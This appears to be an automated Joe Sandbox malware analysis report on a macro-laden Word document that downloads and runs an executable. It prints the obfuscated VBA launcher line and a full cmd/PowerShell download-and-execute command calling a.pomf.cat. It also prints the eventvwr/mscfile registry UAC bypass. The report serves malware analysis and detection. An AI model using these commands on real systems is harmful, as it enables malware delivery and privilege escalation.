Analysis Report

Overview

General Information

Joe Sandbox Version:	17.0.0
Analysis ID:	202154
Start time:	14:47:12
Joe Sandbox Product:	Cloud
Start date:	06.01.2017
Overall analysis duration:	0h 5m 51s
Report type:	full
Sample file name:	zukukm.doc
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 (Office 2010 v14.0.4, Java 1.8.0_40, Flash 16.0.0.305, Acrobat Reader 11.0.08, Internet Explorer 11, Chrome 55, Firefox 43)
Number of analysed new started processes analysed:	12
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies	HCA enabled EGA enabled HDC enabled
Detection:	MAL
Classification:	mal92.evad.expl.troj.winDOC@13/15@1/2
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
EGA Information:	Failed
HDC Information:	Failed
Cookbook Comments:	Found application associated with file extension: .doc Found Word or Excel document Simulate clicks Found new Word/Excel, stop clicking Number of clicks 8 Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): mscorsvw.exe, sppsvc.exe, OSPPSVC.EXE, wisptis.exe, conhost.exe Report size exceeded maximum capacity and may have missing behavior information. Skipping Hybrid Code Analysis (implementation is based on Java, .Net, VB or Delphi, or parses a document) for: WINWORD.EXE, powershell.exe, mmc.exe

Detection

Strategy	Score	Range	Reporting	Detection
Threshold	92	0 - 100	Report FP / FN

Confidence

Strategy	Score	Range	Further Analysis Required?	Confidence
Threshold	5	0 - 5	false

Classification

Analysis Advice

Sample drops PE files which have not been started, submit dropped PE samples for a secondary analysis to Joe Sandbox

Sample has a GUI, but Joe Sandbox has not found any clickable buttons, likely requires more UI automation

Sample monitors Window changes (e.g. starting applications), analyze the sample with the 'Simulates keyboard and window changes' cookbook

Sample sleeps for a long time, analyze it with the 'Bypass long sleeps' cookbook

Sample tries to load a library which is not present or installed on the analysis machine, update the analysis machine

Signature Overview

Click to jump to signature section

Privilege Escalation:

UAC (User Account Control) bypass detected

Show sources

Source: C:\Windows\System32\cmd.exe	Process started: C:\Windows\System32\eventvwr.exe
Source: C:\Windows\System32\cmd.exe	Process started: C:\Windows\System32\reg.exe reg add HKCU\Software\Classes\mscfile\shell\open\command /d C:\Users\LUKETA~1\AppData\Local\Temp\System Interrupts.exe /f

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Creates a window with clipboard capturing capabilities

Show sources

Source: C:\Windows\System32\mmc.exe

Window created: window name: CLIPBRDWNDCLASS

Software Vulnerabilities:

Potential document exploit detected (performs DNS queries)

Show sources

Source: global traffic

DNS query: name: a.pomf.cat

Potential document exploit detected (performs HTTP gets)

Show sources

Source: global traffic

TCP traffic: 192.168.1.16:49163 -> 69.65.17.35:443

Potential document exploit detected (unknown TCP traffic)

Show sources

Source: global traffic

TCP traffic: 192.168.1.16:49163 -> 69.65.17.35:443

Document exploit detected (process start blacklist hit)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Process created: C:\Windows\System32\cmd.exe

Networking:

Urls found in memory or binary data

Show sources

Source: powershell.exe	String found in binary or memory: file://
Source: WINWORD.EXE, powershell.exe	String found in binary or memory: file:///
Source: WINWORD.EXE	String found in binary or memory: file:///c:
Source: powershell.exe	String found in binary or memory: file:///c:/windows/assembly/gac_msil/microsoft.powershell.commands.diagnostics/1.0.0.0__31bf3856ad36
Source: powershell.exe	String found in binary or memory: file:///c:/windows/assembly/gac_msil/microsoft.powershell.commands.management/1.0.0.0__31bf3856ad364
Source: powershell.exe	String found in binary or memory: file:///c:/windows/assembly/gac_msil/microsoft.powershell.commands.utility/1.0.0.0__31bf3856ad364e35
Source: powershell.exe	String found in binary or memory: file:///c:/windows/assembly/gac_msil/microsoft.powershell.consolehost/1.0.0.0__31bf3856ad364e35/micr
Source: powershell.exe	String found in binary or memory: file:///c:/windows/assembly/gac_msil/microsoft.powershell.security/1.0.0.0__31bf3856ad364e35/microso
Source: powershell.exe	String found in binary or memory: file:///c:/windows/assembly/gac_msil/microsoft.wsman.management/1.0.0.0__31bf3856ad364e35/microsoft.
Source: powershell.exe	String found in binary or memory: file:///c:/windows/assembly/gac_msil/system.management.automation/1.0.0.0__31bf3856ad364e35/system.m
Source: mmc.exe	String found in binary or memory: file:///c:/windows/microsoft.net/framework/v2.0.50727/
Source: mmc.exe	String found in binary or memory: file:///c:/windows/system32/
Source: powershell.exe	String found in binary or memory: file:///c:/windows/system32/windowiq
Source: powershell.exe	String found in binary or memory: file:///c:/windows/system32/windowspowershell/v1.0/
Source: powershell.exe	String found in binary or memory: file:///c:/windows/system32/windowspowershell/v1.0/en-us/system.management.automation.resources/syst
Source: WINWORD.EXE	String found in binary or memory: ftp://
Source: WINWORD.EXE, powershell.exe	String found in binary or memory: http://
Source: powershell.exe	String found in binary or memory: http://c
Source: powershell.exe	String found in binary or memory: http://crl.comod
Source: powershell.exe	String found in binary or memory: http://crl.comodo.net/
Source: powershell.exe	String found in binary or memory: http://crl.comodo.net/utn-userfirst-hardware.crl0q
Source: powershell.exe	String found in binary or memory: http://crl.comodoca.com/utn-userfirst-hardware.crl06
Source: powershell.exe	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: powershell.exe	String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: powershell.exe	String found in binary or memory: http://crl.pkioverheid.nl/domorganisatielatestcrl-g2.crl0
Source: powershell.exe	String found in binary or memory: http://crl.pkioverheid.nl/domovlatestcrl.crl0
Source: powershell.exe	String found in binary or memory: http://crl.usertrust.com/utn-userfirst-object.crl0)
Source: powershell.exe	String found in binary or memory: http://crt.comodoca.com/utnaddtrustserverca.crt0$
Source: powershell.exe	String found in binary or memory: http://cybertrust.omniroot.com/repository.cfm0
Source: WINWORD.EXE	String found in binary or memory: http://ns.d88
Source: powershell.exe	String found in binary or memory: http://ocs
Source: powershell.exe	String found in binary or memory: http://ocsp.comodoca.com0
Source: powershell.exe	String found in binary or memory: http://ocsp.comodoca.com0%
Source: powershell.exe	String found in binary or memory: http://ocsp.comodoca.com0-
Source: powershell.exe	String found in binary or memory: http://ocsp.comodoca.com0/
Source: powershell.exe	String found in binary or memory: http://ocsp.comodoca.com05
Source: powershell.exe	String found in binary or memory: http://ocsp.entrust.net03
Source: powershell.exe	String found in binary or memory: http://ocsp.entrust.net0d
Source: powershell.exe	String found in binary or memory: http://schemas.dmtf.org/wbem/wsman/1/cimbinding/associationfilter
Source: powershell.exe	String found in binary or memory: http://schemas.dmtf.org/wbem/wsman/1/wsman/selectorfilter
Source: powershell.exe	String found in binary or memory: http://schemas.dmtf.org/wbem/wsman/identity/1/wsmanidentity.xsd#identifyresponseh
Source: WINWORD.EXE	String found in binary or memory: http://ww.
Source: powershell.exe	String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: powershell.exe	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: powershell.exe	String found in binary or memory: http://www.public-trust.com/cgi-bin/crl/2018/cdp.crl0
Source: powershell.exe	String found in binary or memory: http://www.public-trust.com/cps/omniroot.html0
Source: mmc.exe	String found in binary or memory: http://www.usertrust.com
Source: powershell.exe	String found in binary or memory: http://www.usertrust.com1
Source: WINWORD.EXE	String found in binary or memory: https://
Source: powershell.exe	String found in binary or memory: https://a.po
Source: powershell.exe	String found in binary or memory: https://a.pomf.c
Source: WINWORD.EXE	String found in binary or memory: https://a.pomf.ca
Source: powershell.exe	String found in binary or memory: https://a.pomf.cat
Source: powershell.exe	String found in binary or memory: https://a.pomf.cat/xeufbx.exe
Source: powershell.exe	String found in binary or memory: https://a.pomf.cat/xeufbx.exeh
Source: powershell.exe	String found in binary or memory: https://a.pomf.cat/xeufbx.ext
Source: powershell.exe	String found in binary or memory: https://a.pomf8n#
Source: powershell.exe	String found in binary or memory: https://secure.comodo.com/cps0
Source: powershell.exe	String found in binary or memory: https://w

Downloads files

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\luketaylor\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word

Downloads files from webservers via HTTP

Show sources

Source: global traffic

HTTP traffic detected: GET /xeufbx.exe HTTP/1.1Host: a.pomf.catConnection: Keep-Alive

Found strings which match to known social media urls

Show sources

Source: WINWORD.EXE	String found in binary or memory: The actual process step by step (briefly) If you w Facebook pages. equals www.facebook.com (Facebook)
Source: WINWORD.EXE, ~WRS{7032D191-EDCD-4AEE-82F7-544FBB08647F}.tmp.3044.dr	String found in binary or memory: s always good to add social media profiles and use social-media automation. You may use tools like the Buffer app and Hootsuite to share content from your blog on your Google+ and Facebook pages. equals www.facebook.com (Facebook)
Source: WINWORD.EXE	String found in binary or memory: s always good to add social media profiles and use social-media automation. You may use tools like the Buffer app and Hootsuite to share content from your blog on your Google+ and Facebook pages. D4@ equals www.facebook.com (Facebook)
Source: WINWORD.EXE	String found in binary or memory: *YouTube partnerships equals www.youtube.com (Youtube)
Source: WINWORD.EXE, zukukm.doc	String found in binary or memory: 3. Make a few videos on YouTube and link them to your blog from the description, generating additional traffic. equals www.youtube.com (Youtube)
Source: WINWORD.EXE, ~WRS{7032D191-EDCD-4AEE-82F7-544FBB08647F}.tmp.3044.dr	String found in binary or memory: 3. Make a few videos on YouTube and link them to your blog from the description, generating additional traffic. equals www.youtube.com (Youtube)
Source: WINWORD.EXE	String found in binary or memory: If you have a successful website, you can probably use your traffic to create a successful YouTube channel, which you can monetize instantly through the YouTube partner program. You can also use Youtube You may also give some of your content to educational institutions, community courses and more. equals www.youtube.com (Youtube)
Source: ~WRS{7032D191-EDCD-4AEE-82F7-544FBB08647F}.tmp.3044.dr	String found in binary or memory: If you have a successful website, you can probably use your traffic to create a successful YouTube channel, which you can monetize instantly through the YouTube partner program. You can also use Youtube for one of the main ways to get website traffic, which is awesome traffic by the way, so you may be able to kill two birds with one stone. equals www.youtube.com (Youtube)
Source: WINWORD.EXE	String found in binary or memory: If you have a successful website, you can probably use your traffic to create a successful YouTube channel, which you can monetize instantly through the YouTube partner program. You can also use Youtube for one of the main ways to get website traffic, which is awesome traffic by the way, so you may be able to kill two birds with one stone. l equals www.youtube.com (Youtube)
Source: zukukm.doc	String found in binary or memory: If you have a successful website, you can probably use your traffic to create a successful YouTube channel, which you can monetize instantly through the YouTube partner program. You can also use Youtube for one of the main ways to get website traffic, which is awesome traffic by the way, so you may be able to kill two birds with one stone. p equals www.youtube.com (Youtube)
Source: WINWORD.EXE, zukukm.doc, ~WRS{7032D191-EDCD-4AEE-82F7-544FBB08647F}.tmp.3044.dr	String found in binary or memory: YouTube partnerships equals www.youtube.com (Youtube)
Source: WINWORD.EXE	String found in binary or memory: YouTube partnerships l equals www.youtube.com (Youtube)
Source: WINWORD.EXE, zukukm.doc	String found in binary or memory: YouTube partnerships p equals www.youtube.com (Youtube)
Source: powershell.exe	String found in binary or memory: login.yahoo.com equals www.yahoo.com (Yahoo)
Source: powershell.exe	String found in binary or memory: login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: WINWORD.EXE	String found in binary or memory: p3. Make a few videos on YouTube and link them to your blog from the description, generating additional traffic. l equals www.youtube.com (Youtube)
Source: WINWORD.EXE, zukukm.doc	String found in binary or memory: p3. Make a few videos on YouTube and link them to your blog from the description, generating additional traffic. p equals www.youtube.com (Youtube)
Source: WINWORD.EXE, zukukm.doc	String found in binary or memory: s always good to add social media profiles and use social-media automation. You may use tools like the Buffer app and Hootsuite to share content from your blog on your Google+ and Facebook pages. equals www.facebook.com (Facebook)
Source: WINWORD.EXE	String found in binary or memory: s always good to add social media profiles and use social-media automation. You may use tools like the Buffer app and Hootsuite to share content from your blog on your Google+ and Facebook pages. equals www.facebook.com (Facebook)
Source: WINWORD.EXE	String found in binary or memory: s always good to add social media profiles and use social-media automation. You may use tools like the Buffer app and Hootsuite to share content from your blog on your Google+ and Facebook pages. l equals www.facebook.com (Facebook)
Source: WINWORD.EXE, zukukm.doc	String found in binary or memory: s always good to add social media profiles and use social-media automation. You may use tools like the Buffer app and Hootsuite to share content from your blog on your Google+ and Facebook pages. p equals www.facebook.com (Facebook)
Source: WINWORD.EXE	String found in binary or memory: s always good to add social media profiles and use social-media automation. You may use tools like the Buffer app and Hootsuite to share content from your blog on your Google+ and Facebook pages. shockvehicleTypes of niche sites Adsense niche sites bvvwykhxynyfthufThe most popular is the Adsense niche sites. People build sites on a particular keyword, keep on adding content and make a passive income from Google Adsense. novelsilkAffiliate niche sites angryfinalThe other types are affiliate niche sites. Basically you promote products from the site and earn commission when a purchase is made. You can go with Amazon, Clickbank or ClickSure to choose a product and promote it. The actual process step by step (briefly) If you wanted to start a niche site, you will start by finding a low competition keyword, buying a domain, and setting up hosting. Obviously, there is a lot to learn. Here is covered a lot of the basic tips to learning about niche sites. biihreqmcxucFind a profitable and converting site egrjcyhgkzq
Source: WINWORD.EXE	String found in binary or memory: t get any AdSense income or it will be 10 cents a day from the one advertiser with no competition. Bear in mind however that there are general advertisements, for example Chitika can show cameras, computers and other electronic products that may appeal to a general audience and produce enough click through to make it worthwhile. This is a risky venture though since your niche is not relevant to your monetization method, the amount of income you earn will like be very random and inconsistent. desertessayInstead of being particular about choosing only high AdSense CPC keywords, a mindmap of content may be created, which is more like an FAQ. For example: touristweekend? What is [topic] woljucflhogukuwta? How to use/install [topic] ? Advantages and disadvantages of using [topic] ? Important facts about [topic] These were some of the basic ideas to get started with before getting into detailed keyword research. SEMRUSHmight be used to find keywords. Additional steps to make your niche blog a true dollarextractor A
Source: WINWORD.EXE	String found in binary or memory: t mean your website needs to make money directly. If you use your website to attract social media followers, consider sending an sporadic paid advertisement to your followers for some extra profit. argueinsaneSell links Everyone needs to earn money and sometimes selling a link can help pay the bills.This is a great way to make money from your website but you must weigh up the value of your links before doing so. Placing text links into your site for money is a great way to actually prove that your site can make money. Sub-domain joint venture A special version of co-branding (or a joint venture) where you create a sub-domain on your site dedicated to a specific product; the sub-domain is typically run by the advertiser or your joint venture partner lowottfvllxboflfurnacesniffYouTube partnerships illnessperfectIf you have a successful website, you can probably use your traffic to create a successful YouTube channel, which you can monetize instantly through the YouTube partner program. You can also use Youtube
Source: powershell.exe	String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)

Performs DNS lookups

Show sources

Source: unknown

DNS traffic detected: queries for: a.pomf.cat

Uses HTTPS

Show sources

Source: unknown	Network traffic detected: HTTP traffic on port 49163 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49163

HTTP GET or POST without a user agent

Show sources

Source: global traffic

HTTP traffic detected: GET /xeufbx.exe HTTP/1.1Host: a.pomf.catConnection: Keep-Alive

Uses ping.exe to check the status of other devices and networks

Show sources

Source: unknown

Process created: C:\Windows\System32\PING.EXE

Persistence and Installation Behavior:

Drops PE files

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\luketaylor\AppData\Local\Temp\System Interrupts.exe

Installs new ROOT certificates

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob

Data Obfuscation:

Binary may include packed or encrypted code

Show sources

Source: initial sample

Static PE information: section name: .text entropy: 7.74917510013

PE file contains an invalid checksum

Show sources

Source: System Interrupts.exe.3180.dr

Static PE information: real checksum: 0x0 should be: 0x130984

Document contains an embedded VBA with many string operations indicating source code obfuscation

Show sources

Source: zukukm.doc

Stream path 'Macros/VBA/ThisDocument' : High number of string operations

Spreading:

Enumerates the file system

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\luketaylor\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\luketaylor\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\luketaylor\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\luketaylor\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\luketaylor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\luketaylor\AppData\Roaming\Microsoft

System Summary:

Checks whether correct version of .NET is installed

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Policy\Upgrades

Executable creates window controls seldom found in malware

Show sources

Source: C:\Windows\System32\mmc.exe

Window found: window name: msctls_updown32

Found graphical window changes (likely an installer)

Show sources

Source: Window Recorder

Window detected: More than 3 window changes detected

Uses Microsoft Silverlight

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll

Checks if Microsoft Office is installed

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_USERS\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Uses new MSVCR Dlls

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_50916076bcb9a742\MSVCR90.dll

Binary contains paths to debug symbols

Show sources

Source:	Binary string: indows\MMCEx.pdbpdbCEx.pdb source: mmc.exe
Source:	Binary string: C:\Windows\assembly\GAC_MSIL\MMCEx\3.0.0.0__31bf3856ad364e35\MMCEx.pdb source: mmc.exe
Source:	Binary string: D:\office\Target\word\x86\ship\0\msword.PDB source: WINWORD.EXE
Source:	Binary string: mscorrc.pdb source: powershell.exe, mmc.exe
Source:	Binary string: C:\Windows\dll\MMCEx.pdb source: mmc.exe
Source:	Binary string: C:\Windows\MMCEx.pdb source: mmc.exe
Source:	Binary string: G:\o14\65_VC8\VBE6\legovbe\vbe7.pdbV source: WINWORD.EXE
Source:	Binary string: G:\o14\65_VC8\VBE6\legovbe\vbe7.pdb source: WINWORD.EXE
Source:	Binary string: C:\Windows\symbols\dll\MMCEx.pdb source: mmc.exe
Source:	Binary string: x.pdb source: mmc.exe

Binary contains paths to development resources

Show sources

Source: WINWORD.EXE

Binary or memory string: Unrecognized project languageSThe .VBP file for this project contains an invalid or corrupt library references ID=Error accessing file. Network connection may have been lost.-Fixed or static data can't be larger than 64K

Classification label

Show sources

Source: classification engine

Classification label: mal92.evad.expl.troj.winDOC@13/15@1/2

Creates files inside the program directory

Show sources

Source: C:\Windows\System32\mmc.exe

File created: C:\ProgramData\Microsoft\Event Viewer

Creates files inside the user directory

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\luketaylor\AppData\Roaming\Microsoft\Office\Recent\zukukm.LNK

Creates temporary files

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\LUKETA~1\AppData\Local\Temp\CVRE781.tmp

Document contains an OLE Word Document stream indicating a Microsoft Word file

Show sources

Source: zukukm.doc

OLE indicator, Word Document stream: true

Document contains summary information with irregular field values

Show sources

Source: zukukm.doc	OLE document summary: title field not present or empty
Source: zukukm.doc	OLE document summary: edited time not present or 0

Found command line output

Show sources

Source: C:\Windows\System32\cmd.exe	Console Write: ........1#........... ..0.......E.GJ........1#......@FJJ. ..0.....5.....V.GJ............0..........v........`.....,.....
Source: C:\Windows\System32\reg.exe	Console Write: ........a..v..0.....\...d.......P.............................>w............x.......,."..&..............h...$...........

Parts of this applications are using the .NET runtime (Probably coded in C#)

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\System32\mmc.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\mmc.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp

Reads ini files

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Reads software policies

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Spawns processes

Show sources

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Source: unknown	Process created: C:\Windows\System32\cmd.exe
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: unknown	Process created: C:\Windows\System32\reg.exe
Source: unknown	Process created: C:\Windows\System32\eventvwr.exe
Source: unknown	Process created: C:\Windows\System32\mmc.exe
Source: unknown	Process created: C:\Windows\System32\PING.EXE
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c powershell.exe -w hidden -nop -ep bypass (New-Object System.Net.WebClient).DownloadFile('https://a.pomf.cat/xeufbx.exe','C:\Users\LUKETA~1\AppData\Local\Temp\System Interrupts.exe') & reg add HKCU\Software\Classes\mscfile\shell\open\command /d C:\Users\LUKETA~1\AppData\Local\Temp\System Interrupts.exe /f & eventvwr.exe & PING -n 15 127.0.0.1>nul & C:\Users\LUKETA~1\AppData\Local\Temp\System Interrupts.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -w hidden -nop -ep bypass (New-Object System.Net.WebClient).DownloadFile('https://a.pomf.cat/xeufbx.exe','C:\Users\LUKETA~1\AppData\Local\Temp\System Interrupts.exe')
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add HKCU\Software\Classes\mscfile\shell\open\command /d C:\Users\LUKETA~1\AppData\Local\Temp\System Interrupts.exe /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\eventvwr.exe eventvwr.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE PING -n 15 127.0.0.1
Source: C:\Windows\System32\eventvwr.exe	Process created: C:\Windows\System32\mmc.exe 'C:\Windows\system32\mmc.exe' 'C:\Windows\system32\eventvwr.msc'

Uses an in-process (OLE) Automation server

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

PE file has an executable .text section which is very likely to contain packed code (zlib compression ratio < 0.3)

Show sources

Source: System Interrupts.exe.3180.dr

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Creates mutexes

Show sources

Source: C:\Windows\System32\mmc.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\CLR_PerfMon_WrapMutex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking

Document contains an ObjectPool stream indicating possible embedded files or OLE objects

Show sources

Source: zukukm.doc

OLE indicator, ObjectPool: true

Document contains embedded VBA macros

Show sources

Source: zukukm.doc

OLE indicator, VBA macros: true

Enables security privileges

Show sources

Source: C:\Windows\System32\mmc.exe

Process token adjusted: Security

PE file contains strange resources

Show sources

Source: System Interrupts.exe.3180.dr

Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Reads the hosts file

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File read: C:\Windows\System32\drivers\etc\hosts

Tries to load missing DLLs

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: api-ms-win-appmodel-runtime-l1-1-2.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: api-ms-win-appmodel-runtime-l1-1-0.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: api-ms-win-appmodel-runtime-l1-1-2.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: api-ms-win-appmodel-runtime-l1-1-0.dll

Uses reg.exe to modify the Windows registry

Show sources

Source: unknown

Process created: C:\Windows\System32\reg.exe

Document contains an embedded VBA macro which executes code when the document is opened / closed

Show sources

Source: zukukm.doc

OLE, VBA macro line: Private Sub InkPicture1_Painted(ByVal tdeyraasujfwaannf As Long, ByVal mmideatkmirohserw As MSINKAUTLib.IInkRectangle)

Document contains an embedded VBA macro which may execute processes

Show sources

Source: zukukm.doc

OLE, VBA macro line: CreateObject("ws" & Mid("9cript.sh5", 2, 8) & "ell").Run dutyspread, 0

Document contains an embedded VBA macro with suspicious strings

Show sources

Source: zukukm.doc

OLE, VBA macro line: CreateObject("ws" & Mid("9cript.sh5", 2, 8) & "ell").Run dutyspread, 0

HIPS / PFW / Operating System Protection Evasion:

May try to detect the Windows Explorer process (often used for injection)

Show sources

Source: mmc.exe	Binary or memory string: Progman
Source: mmc.exe	Binary or memory string: Program Manager
Source: mmc.exe	Binary or memory string: Shell_TrayWnd

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c powershell.exe -w hidden -nop -ep bypass (New-Object System.Net.WebClient).DownloadFile('https://a.pomf.cat/xeufbx.exe','C:\Users\LUKETA~1\AppData\Local\Temp\System Interrupts.exe') & reg add HKCU\Software\Classes\mscfile\shell\open\command /d C:\Users\LUKETA~1\AppData\Local\Temp\System Interrupts.exe /f & eventvwr.exe & PING -n 15 127.0.0.1>nul & C:\Users\LUKETA~1\AppData\Local\Temp\System Interrupts.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -w hidden -nop -ep bypass (New-Object System.Net.WebClient).DownloadFile('https://a.pomf.cat/xeufbx.exe','C:\Users\LUKETA~1\AppData\Local\Temp\System Interrupts.exe')

Bypasses PowerShell execution policy

Show sources

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -w hidden -nop -ep bypass (New-Object System.Net.WebClient).DownloadFile('https://a.pomf.cat/xeufbx.exe','C:\Users\LUKETA~1\AppData\Local\Temp\System Interrupts.exe')

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Network Connect: 69.65.17.35 443

Anti Debugging:

Creates guard pages, often used to prevent reverse engineering and debugging

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Memory allocated: page read and write and page guard

Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

System information queried: KernelDebuggerInformation

Enables debug privileges

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Malware Analysis System Evasion:

Queries a list of all running processes

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Contains long sleeps (>= 3 min)

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: -922337203685477

Enumerates the file system

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\luketaylor\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\luketaylor\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\luketaylor\AppData\Roaming
